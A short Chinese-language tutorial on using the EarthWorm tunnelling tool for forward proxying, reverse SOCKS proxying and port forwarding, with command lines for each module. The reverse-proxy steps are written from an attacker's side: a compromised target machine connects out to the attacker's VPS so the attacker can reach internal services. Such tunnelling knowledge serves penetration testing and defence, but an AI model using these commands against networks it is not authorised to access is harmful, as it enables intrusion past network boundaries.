一、简介
EarthWorm是内网穿透的神器,拥有三项功能正向代理,反向代理,端口转发。
为实现这些功能,EarthWorm建立了六大功能模块。分别是ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slave。
从三项功能的角度可以这样划分
|
功能名称 |
对应模块 |
|
正向代理 |
ssocksd |
|
反向代理 |
rcsocks,rssocks |
|
端口转发 |
lcx_listen,lcx_slave,lcx_tran |
二、正向代理
一条命令即可
./ew -s ssocksd --listenport 1080
or
./ew -s ssocksd -l 1080三、反向代理
此处需要使用两个功能模块rcsosks,rssocks
在很多场景,无法直接连接需要当做代理的主机,那么怎么解决这个问题呢?EarthWorm的解决方法十分简单,考虑到我们无法直接连接代理主机,但是代理主机可以主动连接我们,因此需要等待该主机主动连接承担代理任务。而这就是rccosks,rssocks的命令设计想法。rcsocks建立本地代理客户端,指定本地监听反弹的端口,rssocks建立本地代理服务端,并指定建立服务端后主动连接的远程主机的IP和端口。
第1步:在公网的VPS上执行如下命令:
./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &该命令的意思是说公网机器监听1080和1024端口。等待攻击者机器访问1080端口,目标机器访问1024端口。
第2步:目标机器执行如下命令:
./ew_for_Win.exe -s rssocks -d 120.xxx.xxx.xx -e 1024其中-d参数的值为刚刚的公网IP
第3步:攻击者机器通过proxychains或浏览器设置Socks5代理访问目标内网服务
四、端口转发
该功能涉及三个功能模块:lcx_listen,lcx_slave,lcx_tran这三个模块可以建立任意形式的端口转发,可以将内网最深处的主机端口转发出来。
常见的使用命令组合如下:
./ew -s lcx_listen -l 1080 -e 8888
./ew -s lcx_tran -l 1080 -f [connIP] -g 8888数据流向 local:1080 < — > local:8888 < — > remoteIP:1080
用于实现将本地端口转发到远程可直接连接的某主机的端口,
./ew -s lcx_listen -l 1080 -e 8888
./ew -s lcx_slave -d [ref_ip] -e 1080 -f [connIP] -g 1080数据流向 connIP:8888 < — > connIP:1080 < — > ref_ip:1080
还可以有许多组合方式,需要时进行总结。